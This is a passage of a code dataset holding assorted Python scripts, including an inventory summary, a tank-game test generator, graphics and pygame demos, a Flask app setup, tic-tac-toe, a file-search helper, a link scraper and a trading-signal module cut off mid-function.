df.rename(columns={df.columns[0]: \"DATETIME\", df.columns[1]: \"ITEMNUM\"}, inplace=True)\n df = df.set_index([\"DATETIME\", \"ITEMNUM\"])\n df.update(df.groupby(level=\"ITEMNUM\").bfill())\n return df\n\n\ndef daily_time_series(clean_dataframe):\n df = (\n clean_dataframe.reset_index()\n .pivot_table(index=\"DATETIME\", columns=\"ITEMNUM\", values=\"INVENTORY\", aggfunc=sum)\n .bfill()\n .unstack()\n .reset_index(name=\"INVENTORY\")\n )\n\n print(df.head(), df.tail())\n\n sum_df = df.groupby(df[\"DATETIME\"]).sum().reset_index()\n sum_df = sum_df[[\"DATETIME\", \"INVENTORY\"]]\n\n print(sum_df.head(), sum_df.tail())\n\n sum_df.to_csv(r\"c:\\users\\uxkp\\desktop\\time_series_test_886.csv\")\n\n\nsql = r\"C:\\Users\\uxkp\\sql_queries\\inventory\\avg_bal.sql\"\ndaily_time_series(data_prep(read_sql(sql)))\n","sub_path":"inventory_summary_past_year.py","file_name":"inventory_summary_past_year.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"511208876","text":"from random import randint, choice, random\nfrom operator import itemgetter\nimport sys\nimport string\nimport argparse\n\n\ndef gen_valid():\n return [randint(1, NUM_TANKS), randint(0, MAX_VALID_COORD),\n randint(0, MAX_VALID_COORD)]\n\n\ndef attack_to_str(tanks, x, y):\n return (\"p\" + \"o\" * tanks + \"int(\", str(x) + \",\" + str(y) + \")\")\n\n\ndef add_comma(p2_str):\n index = randint(0, len(p2_str) - 1)\n if index == 0:\n return \",\"\n return p2_str[:index] + \",\" + p2_str[index:p2_str.find(',') + 1]\n\n\ndef add_open_parens(p2_str):\n index = randint(0, len(p2_str) - 1)\n return p2_str[:index] + \"(\"\n\n \ndef valid_noise_charsets():\n p1_charsets = [list(string.printable), list(string.printable),\n list(string.printable), list(string.printable),\n list(string.printable), list(string.printable)]\n p1_charsets[0].remove('p')\n p1_charsets[1].remove('o')\n p1_charsets[2].remove('o')\n p1_charsets[2].remove('i')\n p1_charsets[3].remove('n')\n p1_charsets[4].remove('t')\n p1_charsets[5].remove('(')\n p2_charset = list(string.printable)\n p2_charset.remove('(')\n p2_charset.remove(')')\n p2_charset.remove(',')\n for i in range(0, 10):\n p2_charset.remove(str(i))\n return p1_charsets, p2_charset\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"num_attacks\", type=int,\n help=\"number of valid attacks to be generated\")\n parser.add_argument(\"-m\", \"--memory\", type=int, default=30,\n help=\"maximum amount of memory to be used, in MB (default: %(default)sMB)\")\n parser.add_argument(\"-o\", \"--output\", action=\"store_true\",\n help=\"generates and prints the expected output to stderr\")\n parser.add_argument(\"-n\", \"--noise\", type=float, default=0.5,\n help=\"proportion of noise to content (default: %(default)s)\")\n parser.add_argument(\"-i\", \"--invalid\", type=float, default=0.2,\n help=\"proportion of invalid inputs to valid ones (default: %(default)s)\")\n parser.add_argument(\"-t\", \"--tanks\", type=int, default=40,\n help=\"maximum amount of tanks per input (default: %(default)s)\")\n parser.add_argument(\"-c\", \"--coordmax\", type=int, default=99999,\n help=\"maximum value for coordinates (default: %(default)s)\")\n args = parser.parse_args()\n\n MAX_VALID_COORD = args.coordmax\n NUM_TANKS = args.tanks\n GEN_OUTPUT = args.output\n INVALID_PROP = args.invalid\n NOISE_PROP = args.noise\n P1_CHARSETS, P2_CHARSET = valid_noise_charsets()\n\n num_attacks = args.num_attacks\n\n 
print(args.memory) # available memory\n\n base = (randint(0, MAX_VALID_COORD), randint(0, MAX_VALID_COORD))\n print(*base) # base coordinates\n\n if GEN_OUTPUT:\n attacks = []\n\n while num_attacks:\n attack = gen_valid()\n\n if random() < INVALID_PROP: # invalid\n inv_type = randint(1, 4)\n if inv_type == 1:\n attack[1] = randint(100000, 999999)\n elif inv_type == 2:\n attack[2] = randint(100000, 999999)\n p1_str, p2_str = attack_to_str(*attack)\n if inv_type == 1:\n p2_str = p2_str[:6] # 123098|23,2430857\n elif inv_type == 2:\n p2_str = p2_str[:p2_str.find(',') + 7] # 99999,812394|2094\n elif inv_type == 3:\n p2_str = add_comma(p2_str)\n else: # type == 4\n p2_str = add_open_parens(p2_str)\n else:\n if GEN_OUTPUT:\n attacks.append(attack)\n p1_str, p2_str = attack_to_str(*attack)\n num_attacks -= 1\n pos = 0\n\n while pos < len(p1_str):\n if random() < NOISE_PROP:\n if pos < 3:\n curr_charset = P1_CHARSETS[pos]\n elif pos < (2 + attack[0]):\n curr_charset = P1_CHARSETS[2]\n else:\n curr_charset = P1_CHARSETS[pos - attack[0] + 1]\n sys.stdout.write(choice(curr_charset))\n else:\n sys.stdout.write(p1_str[pos])\n pos += 1\n\n pos = 0\n while pos < len(p2_str):\n if random() < NOISE_PROP:\n sys.stdout.write(choice(P2_CHARSET))\n else:\n sys.stdout.write(p2_str[pos])\n pos += 1\n\n sys.stdout.write(\"\\n\")\n\n if GEN_OUTPUT:\n attacks.sort(\n key=lambda a: (base[0] - a[1]) ** 2 + (base[1] - a[2]) ** 2)\n attacks.sort(key=itemgetter(0), reverse=True)\n for attack in attacks:\n print('{0};({1},{2})'.format(*attack), file=sys.stderr)\n","sub_path":"tp1/tools/testgen.py","file_name":"testgen.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"344500543","text":"\"\"\"\n Simple Sine manipulation\n\"\"\"\n# Setup root_logger:\nimport logging as root_logger\nLOGLEVEL = root_logger.DEBUG\nLOG_FILE_NAME = \"log.cairosine\"\nroot_logger.basicConfig(filename=LOG_FILE_NAME, level=LOGLEVEL, filemode='w')\n\nconsole = root_logger.StreamHandler()\nconsole.setLevel(root_logger.INFO)\nroot_logger.getLogger('').addHandler(console)\nlogging = root_logger.getLogger(__name__)\n##############################\n# IMPORTS\n####################\nimport cairo\nimport numpy as np\nimport cairo_utils as utils\nfrom math import pi\nfrom os.path import join,isfile,exists,isdir\nfrom os import listdir\nimport argparse\nimport IPython\n\n##############################\n# CONSTANTS\n####################\nN = 10\nX = pow(2,N)\nY = pow(2,N)\nsurface = cairo.ImageSurface(cairo.FORMAT_ARGB32, X,Y)\nctx = cairo.Context(surface)\nctx.scale(X,Y) #coords in 0-1 range\n\nFILENAME = \"cairo_sine\"\nIMAGE_DIR = \"images\"\n\nSAMPLENUM = 1000\nRADIUS = 0.01\nNUM_OF_FRAMES = 100\n##############################\n# VARIABLES\n####################\nbase_indices = np.linspace(0,2 * pi,SAMPLENUM)\nbase_sine = np.sin(base_indices)\n\nfast_sine = np.linspace(0,2*pi, int(SAMPLENUM * 0.5))\n\n#utility modifiers\nss = lambda s, x : s * x\nos = lambda s, x : s + x\nsos = lambda s, x : (s * x) + x\n\n\n##############################\n# Utilities\n####################\ndef draw(i=0,m=1):\n \"\"\" Draw a single image of a sine wave.\n i : index of the image to write\n m : scaling factor of the image\n \"\"\"\n utils.drawing.clear_canvas(ctx)\n xs = np.linspace(0,1,SAMPLENUM)\n ys = base_sine\n\n #ys = 0.5 + ss((shape(0.5 + ss(ss(ss(base_sine,1.4),m),0.5)) - 0.5),0.8)\n #todo: apply a filter here\n\n\n ys = ss(ys, m)\n ys = ss(ys, 0.5)\n ys = os(ys, 
0.5)\n\n    ys = shape(ys) \n    logging.info(\"{}-{}, {:.2f}-{:.2f}\".format(xs.min(),xs.max(), ys.min(), ys.max())) \n    for x,y in zip(xs,ys):\n        utils.drawing.drawCircle(ctx,x,y,RADIUS)\n    utils.drawing.write_to_png(surface,join(IMAGE_DIR,FILENAME),i)\n\ndef draw_multiple():\n    \"\"\" Draw NUM_OF_FRAMES images, scaling from 0 to 1 \"\"\"\n    frameNum = range(NUM_OF_FRAMES)\n    base_num = list(range(int(NUM_OF_FRAMES * 0.5)))\n    rev_num = base_num.copy()\n    rev_num.reverse()\n    combined = base_num + rev_num\n    \n    for i,m in zip(frameNum, soft_knee(combined,1.0,2.0,0.3)):\n        logging.info(\"Drawing Frame: {}\".format(i))\n        draw(i,(m/(NUM_OF_FRAMES*0.2)))\n\n\n#An example shaping function\ndef shape(x): return (4/9 * pow(x,6)) - (17/9 * pow(x,4)) + (22/9 * pow(x,2))\n\n\n# A Simple soft_knee compression curve\n# Source: https://se.mathworks.com/help/audio/ref/compressor-class.html\n# Input: 1d np.array(), Threshold, Ratio, Knee width\ndef soft_knee(i,t,r,k):\n    under = np.array([x for x in i if x < (t - k/2)])\n    inKnee = np.array([x for x in i if (t - k/2) <= x and x <= (t + k/2)])\n    over = np.array([x for x in i if (t + k/2) < x])\n\n    k_f = (1/r - 1)\n    intermediate = inKnee - t + k/2\n    intermediate_pow = pow(intermediate,2)\n    k_div_amnt = 2 * k\n    k_mod = (k_f * intermediate_pow) / k_div_amnt\n    k_red = inKnee + k_mod\n    \n    over_red = t + ((over - t)) / r\n\n    return np.concatenate((under,k_red,over_red))\n\n\n\n##############################\n# Core Functions\n####################\n\n\n#Argparse setup:\nap = argparse.ArgumentParser()\nap.add_argument('-s','--single',help=\"Render just a single image\",\n                action=\"store_true\")\n    \n########################################\nif __name__ == \"__main__\":\n    logging.info(\"Starting \")\n    args = ap.parse_args()\n    if args.single:\n        draw(0,1)\n    else:\n        draw_multiple()\n","sub_path":"python/cairo/cairoSine.py","file_name":"cairoSine.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"312925119","text":"bif = \"bg.jpg\"\r\nmif = \"ball.png\"\r\n\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\n\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((640, 320), 0, 32)\r\nbackground = pygame.image.load(bif).convert()\r\nball = pygame.image.load(mif).convert_alpha()\r\n\r\nx = 0\r\nclock = pygame.time.Clock()\r\nspeed = 250\r\n\r\nwhile True:\r\n    for event in pygame.event.get():\r\n        if event.type == QUIT:\r\n            pygame.quit()\r\n            sys.exit()\r\n\r\n    screen.blit(background, (0, 0))\r\n    screen.blit(ball, (x, 150))\r\n\r\n    # set up speed and time\r\n    # calculate distance moved (dm) = speed * time\r\n    # add distance moved to the x coordinate\r\n    # move x with the given time \r\n    milli = clock.tick()\r\n    seconds = milli/10000.\r\n    dm = seconds * speed\r\n    x += dm\r\n\r\n    if x > 640:\r\n        x = 0\r\n\r\n    # draw rectangles\r\n    screen.lock()\r\n    pygame.draw.rect(screen, (140, 240, 130), Rect((120, 120), (50, 50)))\r\n    pygame.draw.rect(screen, (140, 240, 130), Rect((250, 120), (50, 50)))\r\n    pygame.draw.rect(screen, (140, 240, 130), Rect((380, 120), (50, 50)))\r\n    pygame.draw.rect(screen, (140, 240, 130), Rect((500, 120), (50, 50)))\r\n    screen.unlock()\r\n\r\n    pygame.display.update()\r\n","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"642673","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import 
Marshmallow\nfrom flask_bcrypt import Bcrypt\nfrom flask_jwt_extended import JWTManager\nfrom flask_redis import FlaskRedis\nfrom redis import ConnectionError\n\nfrom app import config\nfrom app.util.email_sender import EmailSender\n\ndb = SQLAlchemy()\nma = Marshmallow()\nbcrypt = Bcrypt()\njwt = JWTManager()\nredis_client = FlaskRedis()\nemail_sender = EmailSender()\n\n\ndef create_app(config):\n    app = Flask(__name__)\n    app.config.from_object(config)\n\n    from app.api.v1 import v1_blueprint\n    app.register_blueprint(v1_blueprint, url_prefix='/api/v1')\n\n\n    db.init_app(app)\n    ma.init_app(app)\n    bcrypt.init_app(app)\n    jwt.init_app(app)\n    redis_client.init_app(app)\n    email_sender.init_app(app)\n\n    wait_db_ready(app)\n    wait_redis_ready(app)\n\n    with app.app_context():\n        db.create_all()\n\n\n\n    # from app.api.v1.image import image_blueprint\n    # from app.api.v1.board import board_blueprint\n    # from app.api.v1.user import user_blueprint\n    # from app.api.v1.user import account\n    #\n    # app.register_blueprint(board_blueprint, url_prefix='/api/board')\n    # app.register_blueprint(user_blueprint, url_prefix='/api/users')\n    # app.register_blueprint(image_blueprint, url_prefix='/api/images')\n\n    return app\n\n\nfrom functools import wraps\nfrom flask import jsonify\nfrom flask_jwt_extended import verify_jwt_in_request, get_jwt_claims\n\ndef admin_required(fn):\n    @wraps(fn)\n    def wrapper(*args, **kwargs):\n        verify_jwt_in_request()\n        claims = get_jwt_claims()\n        if not claims['roles'] == 'admin':\n            return jsonify(msg='Access denied, admin only!'), 403\n        else:\n            return fn(*args, **kwargs)\n\n    return wrapper\n\n\nimport time\nfrom sqlalchemy.exc import OperationalError\nfrom sqlalchemy.sql import text\n\ndef wait_db_ready(app):\n    wait_db_ready.num_of_try = 0\n\n    while True:\n        try:\n            with app.app_context():\n                db.session.query(\"1\").from_statement(text(\"SELECT 1\")).all()\n                return True\n        except OperationalError:\n            time.sleep(.5)\n            if wait_db_ready.num_of_try >= 20:\n                raise Exception('db not working!')\n            else:\n                wait_db_ready.num_of_try += 1\n                continue\n        except Exception as e:\n            raise e\n\n\ndef wait_redis_ready(app):\n    wait_redis_ready.num_of_try = 0\n\n    while True:\n        try:\n            with app.app_context():\n                redis_client.ping()\n                return True\n        except ConnectionError:\n            time.sleep(.5)\n            if wait_redis_ready.num_of_try >= 20:\n                raise Exception('redis not working!')\n            else:\n                wait_redis_ready.num_of_try += 1\n                continue\n        except Exception as e:\n            raise e\n\n\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268306940","text":"\"\"\"Module provides CruxConfig object to manage API configuration settings.\"\"\"\n\nimport os\nimport platform\nimport re\nfrom typing import (  # noqa: F401 pylint: disable=unused-import\n    Dict,\n    MutableMapping,\n    Optional,\n    Text,\n    Union,\n)\n\nimport requests\n\nfrom crux.__version__ import __version__\n\n\nclass CruxConfig(object):\n    \"\"\"\n    Crux Configuration Class.\n    \"\"\"\n\n    def __init__(\n        self,\n        api_key=None,  # type: Optional[str]\n        api_host=None,  # type: str\n        api_prefix=None,  # type: str\n        proxies=None,  # type: Optional[MutableMapping[Text, Text]]\n        user_agent=None,  # type: str\n    ):\n        # type: (...) -> None\n        \"\"\"\n        Args:\n            api_key (str): API Key. Defaults to None.\n            api_host (str): API URL. Defaults to None.\n            api_prefix (str): API prefix to be used. Defaults to None.\n            proxies (dict): Proxies to be used. 
Defaults to None.\n            user_agent (str): User agent to be used. Defaults to None.\n\n        Raises:\n            ValueError: If CRUX_API_KEY is not set.\n        \"\"\"\n        self.re_user_agent_banned_chars = re.compile(r\"[^a-zA-Z0-9._+~-]\")\n        self.re_whitespace_runs = re.compile(r\"\\s+\")\n\n        if api_key is None:\n            if \"CRUX_API_KEY\" in os.environ:\n                self.api_key = os.environ.get(\"CRUX_API_KEY\")  # type: Optional[str]\n            else:\n                raise ValueError(\"API KEY is required\")\n        else:\n            self.api_key = api_key  # type: Optional[str]\n\n        if api_host is None:\n            self.api_host = os.environ.get(\n                \"CRUX_API_HOST\", \"https://api.cruxinformatics.com\"\n            )\n        else:\n            self.api_host = api_host\n\n        if api_prefix is None:\n            self.api_prefix = os.environ.get(\"CRUX_API_PREFIX\", \"plat-api\")\n        else:\n            self.api_prefix = api_prefix\n\n        if user_agent is None:\n            self.user_agent = self._default_user_agent()\n        else:\n            self.user_agent = user_agent\n\n        self.proxies = (\n            proxies if proxies else {}\n        )  # type: Optional[MutableMapping[Text, Text]]\n\n    def _default_user_agent(self):\n        # type: () -> str\n        user_agent = (\n            \"crux-python/{ver}\"\n            \" requests/{req_ver} {py_impl}/{py_ver} \"\n            \"{os}/{os_ver} {cpu}/{machine}\"\n        ).format(\n            ver=__version__,\n            req_ver=self._sanitize_user_agent_part(requests.__version__),\n            py_impl=self._sanitize_user_agent_part(platform.python_implementation()),\n            py_ver=self._sanitize_user_agent_part(platform.python_version()),\n            os=self._sanitize_user_agent_part(platform.system()),\n            os_ver=self._sanitize_user_agent_part(platform.release()),\n            cpu=self._sanitize_user_agent_part(platform.processor()),\n            machine=self._sanitize_user_agent_part(platform.machine()),\n        )\n\n        return user_agent\n\n    def _sanitize_user_agent_part(self, part):\n        # type: (str) -> str\n        if part:\n            no_space_part = self.re_whitespace_runs.sub(\"_\", part)\n            sanitized_part = self.re_user_agent_banned_chars.sub(\"\", no_space_part)\n            if sanitized_part:\n                return sanitized_part\n        return \"unknown\"\n","sub_path":"crux/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"534761813","text":"\"\"\"Tic Tac Toe\"\"\"\nimport sys\n\nX, O, BLANK = 'x', 'o', ' '\n\nBOARD_STR = '''\n {} | {} | {} \n-----------\n {} | {} | {} \n-----------\n {} | {} | {} \n'''\n\n\nclass GameOver(Exception):\n    \"\"\"Raised when the game ends\"\"\"\n\n\ndef main():\n    \"\"\"Runs Tic Tac Toe\"\"\"\n    print_instructions()\n\n    player_1, player_2 = choose_players()\n\n    board = [BLANK] * 9\n\n    while True:\n        try:\n            play_turn(player_1, board)\n            play_turn(player_2, board)\n        except GameOver:\n            break\n\n\ndef print_instructions():\n    \"\"\"Print instructions on game start\"\"\"\n    print(\n        'Welcome to Tic Tac Toe.\\n'\n        'Board positions are as follows:'\n    )\n    print_board_positions()\n\n\ndef print_board_positions():\n    \"\"\"Prints the board positions\"\"\"\n    positions = range(1, 9+1)\n    print(BOARD_STR.format(*positions))\n\n\ndef choose_players():\n    \"\"\"Chooses the symbols for each player\"\"\"\n    while True:\n        try:\n            input_string = input(\"Choose Player 1 symbol ('x' or 'o'): \")\n        except KeyboardInterrupt:\n            sys.exit()\n\n        input_string = input_string.lower()\n\n        if input_string == X:\n            return X, O\n\n        if input_string == O:\n            return O, X\n\n        print('Try again.')\n\n\ndef play_turn(player, board):\n    \"\"\"Plays one turn of the game, and throws on game over\"\"\"\n    print_board(board)\n\n    player_input(player, board)\n\n    if check_win(player, board):\n        print_board(board)\n        
print(f'Player {player} won!')\n        raise GameOver\n\n    if check_tie(board):\n        print_board(board)\n        print('It\\'s a tie!')\n        raise GameOver\n\n\ndef print_board(board):\n    \"\"\"Prints the board\"\"\"\n    print(BOARD_STR.format(*board))\n\n\ndef player_input(player_char, board):\n    \"\"\"Takes a position input from the player\"\"\"\n    while True:\n        try:\n            position_input = input(f'{player_char}> ')\n        except KeyboardInterrupt:\n            sys.exit()\n\n        if not position_input.isdigit():\n            print('Try again.')\n            continue\n\n        position = int(position_input) - 1\n\n        if position < 0 or position >= len(board):\n            print(f'Choose a value between 1 and {len(board)}.')\n            continue\n\n        if board[position] != BLANK:\n            print('Choose an empty cell.')\n            continue\n\n        board[position] = player_char\n        break\n\n\ndef check_win(char, board):\n    \"\"\"Checks if a player has won the game\"\"\"\n    rows = (\n        (0, 1, 2),\n        (3, 4, 5),\n        (6, 7, 8),\n    )\n    cols = (\n        (0, 3, 6),\n        (1, 4, 7),\n        (2, 5, 8),\n    )\n    diags = (\n        (2, 4, 6),\n        (0, 4, 8),\n    )\n\n    edges = (*rows, *cols, *diags)\n\n    for edge in edges:\n        if all(board[index] == char for index in edge):\n            return True\n\n    return False\n\n\ndef check_tie(board):\n    \"\"\"Checks if the game was a tie\"\"\"\n    return all(char != BLANK for char in board)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"tic.py","file_name":"tic.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"357084977","text":"import os\nimport sys\nimport pyttsx3 as spk\nimport speech_recognition as sr\nfrom word2number import w2n\n\ndef get_index(inst):\n\treturn w2n.word_to_num(inst)\n\ndef open_file(inpt):\n\tos.popen('start /wait \"{pth}\"'.format(pth=y[inpt]))\n\ndef get_response():\n\tspk.speak(\"Which file shall i open for you sir ?\")\n\tr = sr.Recognizer()\n\tmic = sr.Microphone()\n\twith mic as source:\n\t\tr.adjust_for_ambient_noise(source)\n\t\taudio = r.listen(source)\n\tinst = r.recognize_google(audio)\n\tif \"exit\" in inst or \"quit\" in inst or inst == \"bye\" or inst == \"good bye\":\n\t\tspk.speak(\"Good bye sir...\")\n\t\texit()\n\telse:\n\t\tnum = get_index(inst)\n\t\tspk.speak(\"Opening file number \" + str(num))\n\t\topen_file(num)\n\ndef search_any_file(filename):\n\tpths=''\n\tprint(filename)\n\tprint('Searching File....')\n\tpth=os.popen(\"wmic logicaldisk get caption\").read()\n\tdisks = pth.split(\"\\n\\n\")\n\tfor y in range(1,len(disks)):\n\t\tdisks[y]=disks[y].strip()\n\t\tpths+=os.popen(\"dir \"+disks[y]+\"\\\\\"+filename+\".* /b/s\").read()\n\tpaths = pths.split(\"\\n\")\n\treturn paths\n\nfile ='\"'+sys.argv[1]+'\"'\n\ny=search_any_file(file)\n\nspk.speak(\"I found the following files for you...\")\nprint(\"List of files\")\nprint(\"---\" * 35)\nfor z in range(len(y[:-1])):\n\tprint(z+1,\" | \",y[z])\nprint(\"---\" * 35)\n\nwhile True:\n\ttry:\n\t\tget_response()\n\texcept:\n\t\tspk.speak(\"I can not understand what you are saying...\")","sub_path":"Vision/bin/search_file.py","file_name":"search_file.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"482456827","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nfrom logs import Logger\n\n\nclass Parse_Link(object):\n    \"\"\"\n    The main actor in this play:\n    - creates a list\n    - parses the page\n        * finds all the <a> objects \n        * grabs the href\n        * if this link is not in the list yet\n            and this link 
does not lead to social networks\n            and is not an external link\n            and is not a text anchor:\n                strips the parameters after the ?\n                strips the domain\n                adds it\n    - and writes all the links to a file\n        so that the My_Tree() tree generator can read them\n    \"\"\"\n    def __init__(self, url):\n        self.url = url\n        self.list_links = []\n        self.filename = 'parsed_links.txt'\n        self.social = ['vk', 'facebook', 'linkedin', 'twitter', 'callto', 'skype', 'tel', '#']\n\n    def make_links(self):\n        log = Logger(onprint=False)\n\n        log.debug(f'start urlopen {self.url}')\n        \n        page = urlopen(self.url)\n        hostname = urlparse(self.url).hostname\n\n        log.info(f'start soup {self.url}')\n        soup = BeautifulSoup(page, 'html.parser')\n\n        # find all links\n        all_links = soup.find_all('a')\n\n        for link in all_links:\n            # grab the href\n            l = link.get('href')\n\n            if l:\n                # strip query arguments from the link\n                if '?' in l:\n                    l = l[:l.find('?')]\n\n                if hostname in l:\n                    # strip the domain\n                    l = l.split(hostname)\n                    l = l[-1]\n\n                for s in self.social:\n                    # drop links to social networks\n                    if s in l :\n                        l = 'zero'\n\n                # check whether this is an internal link\n                if l.startswith('http') and hostname not in l:\n                    l = 'zero'\n                \n                # save to the list\n                if l not in self.list_links and l != 'zero' and len(l) > 1:\n                    self.list_links.append(l)\n\n        log.info(f'finish make_links in {self.url}')\n\n    def write_to_file(self):\n        # write to file\n        with open(self.filename, 'w') as f:\n            for link in self.list_links:\n                f.write(f\"{link}\\n\")\n","sub_path":"parse_link.py","file_name":"parse_link.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"435878643","text":"import asyncio\nimport os\nfrom datetime import datetime\n\nimport pandas as pd\nimport pandas_ta as ta\nimport numpy as np\nimport scipy.signal\nfrom trader import Trader\nfrom coin_data import CoinData\n\nclient = Trader().client\nfile_path = os.path.abspath(os.path.dirname(__file__))\nos.chdir(file_path)\n\n\nclass Signals:\n\n    def __init__(self, symbol, tf):\n\n        \"\"\"Check for signals for given symbol and timeframe\"\"\"\n\n        self.symbol = symbol.upper()\n        self.tf = tf\n        self.df = CoinData.get_dataframe(symbol, tf)\n        self.df = self.df_ta()\n        # self.df = self.get_heiken_ashi()\n        # self.vol_signal = self.vol_rise_fall()\n        # self.vol_candle = self.large_vol_candle()\n        # self.HA_trend = self.get_heiken_ashi_trend(self.get_heiken_ashi(self.df))\n        self.rsi_ob_os_dict = {\n            'overbought': False,\n            'oversold': False,\n        }\n\n        self.rsi_div_dict = {\n            'possible bearish divergence': False,\n            'possible bullish divergence': False,\n            'confirmed bearish divergence': False,\n            'confirmed bullish divergence': False,\n        }\n\n        self.macd_dict = {\n            'MACD cross': None,\n            'MACD 0 cross': None,\n        }\n\n        self.ema_signals_dict = {\n            'Price crossing EMA200': None,\n            'EMA20 crossing EMA50': None,\n            'EMA50 crossing EMA200': None,\n        }\n\n    async def _async_init(self):\n        task_0 = asyncio.create_task(self.rsi_overbought_oversold())\n        task_1 = asyncio.create_task(self.rsi_divergence())\n        task_2 = asyncio.create_task(self.macd_signals())\n        task_3 = asyncio.create_task(self.ema_signals())\n        await task_0\n        await task_1\n        await task_2\n        await task_3\n\n    def full_check(self):\n        self.rsi_divergence()\n        self.ema_signals()\n        self.macd_signals()\n        self.rsi_overbought_oversold()\n        # self.vol_rise_fall()\n        # self.large_vol_candle()\n\n    def df_ta(self) -> pd.DataFrame:\n        df = self.df\n        df['rsi'] = ta.rsi(df.close, 14)\n        df = pd.concat((df, ta.macd(df.close, 12, 26, 9)), axis=1)\n        df['ema_20'], df['ema_50'] = 
ta.ema(df.close, 20), ta.ema(df.close, 50)\n if len(df) >= 288:\n df['ema_200'] = ta.ema(df.close, 200)\n else:\n df['ema_200'] = ta.ema(df.close, len(df.close) - 3)\n df = df.tail(88)\n return df\n\n @staticmethod\n def get_heiken_ashi(df):\n df['HA_Close'] = (df['open'] + df['high'] + df['low'] + df['close']) / 4\n idx = df.index.name\n df.reset_index(inplace=True)\n\n for i in range(0, len(df)):\n if i == 0:\n df.at[i, 'HA_Open'] = ((df._get_value(i, 'open') + df._get_value(i, 'close')) / 2)\n else:\n df.at[i, 'HA_Open'] = ((df._get_value(i - 1, 'HA_Open') + df._get_value(i - 1, 'HA_Close')) / 2)\n\n if idx:\n df.set_index(idx, inplace=True)\n\n df['HA_High'] = df[['HA_Open', 'HA_Close', 'high']].max(axis=1)\n df['HA_Low'] = df[['HA_Open', 'HA_Close', 'low']].min(axis=1)\n\n return df\n\n @staticmethod\n def get_heiken_ashi_trend(df):\n if df['HA_Close'].iloc[-1] > df['HA_Open'].iloc[-1]:\n if df['HA_Close'].iloc[-2] > df['HA_Open'].iloc[-2]:\n return True\n elif df['HA_Close'].iloc[-1] < df['HA_Open'].iloc[-1]:\n if df['HA_Close'].iloc[-2] < df['HA_Open'].iloc[-2]:\n return False\n else:\n return None\n\n def rsi_divergence(self):\n rsi_array = np.array(self.df['rsi'].tail(20).array)\n close_array = np.array(self.df['close'].tail(20).array)\n rsi_peaks, _ = scipy.signal.find_peaks(rsi_array)\n rsi_troughs, _ = scipy.signal.find_peaks(-rsi_array)\n original_index = len(close_array)\n indices = np.array([])\n\n # bearish divergence confirmed: rsi formed lower peak while price formed higher peak\n if 70 <= rsi_array[rsi_peaks[-2]] >= rsi_array[rsi_peaks[-1]] >= rsi_array[-2] >= rsi_array[-1]:\n if close_array[rsi_peaks[-2]] <= close_array[rsi_peaks[-1]]:\n close_array = np.array([close_array[rsi_peaks[-2]], close_array[rsi_peaks[-1]]])\n rsi_array = np.array([rsi_array[rsi_peaks[-2]], rsi_array[rsi_peaks[-1]]])\n indices = np.array([rsi_peaks[-2], rsi_peaks[-1]])\n self.rsi_div_dict['confirmed bearish divergence'] = True\n\n # possible bearish divergence: rsi forming lower peak while price forming higher peak\n elif 70 <= rsi_array[rsi_peaks[-1]] >= rsi_array[-2] > rsi_array[-1]:\n if close_array[rsi_peaks[-1]] <= close_array[-1]:\n close_array = np.array([close_array[rsi_peaks[-1]], close_array[-1]])\n rsi_array = np.array([rsi_array[rsi_peaks[-1]], rsi_array[-1]])\n indices = np.array([rsi_peaks[-1], original_index])\n self.rsi_div_dict['possible bearish divergence'] = True\n\n # bullish divergence confirmed: rsi formed higher trough while price formed lower trough\n elif 30 >= rsi_array[rsi_troughs[-2]] <= rsi_array[rsi_troughs[-1]] <= rsi_array[-2] <= rsi_array[-1]:\n if close_array[rsi_troughs[-2]] >= close_array[rsi_troughs[-1]]:\n close_array = np.array([close_array[rsi_troughs[-2]], close_array[rsi_troughs[-1]]])\n rsi_array = np.array([rsi_array[rsi_troughs[-2]], rsi_array[rsi_troughs[-1]]])\n indices = np.array([rsi_troughs[-2], rsi_troughs[-1]])\n self.rsi_div_dict['confirmed bullish divergence'] = True\n\n # possible bullish divergence: rsi forming higher trough while price forming lower trough\n elif 30 >= rsi_array[rsi_troughs[-1]] <= rsi_array[-2] < rsi_array[-1]:\n if close_array[rsi_troughs[-1]] >= close_array[-1]:\n close_array = np.array([close_array[rsi_troughs[-1]], close_array[-1]])\n rsi_array = np.array([rsi_array[rsi_troughs[-1]], rsi_array[-1]])\n indices = np.array([rsi_troughs[-1], original_index])\n self.rsi_div_dict['possible bullish divergence'] = True\n\n return self.rsi_div_dict, close_array, rsi_array, indices\n\n def rsi_overbought_oversold(self, o_s=30, 
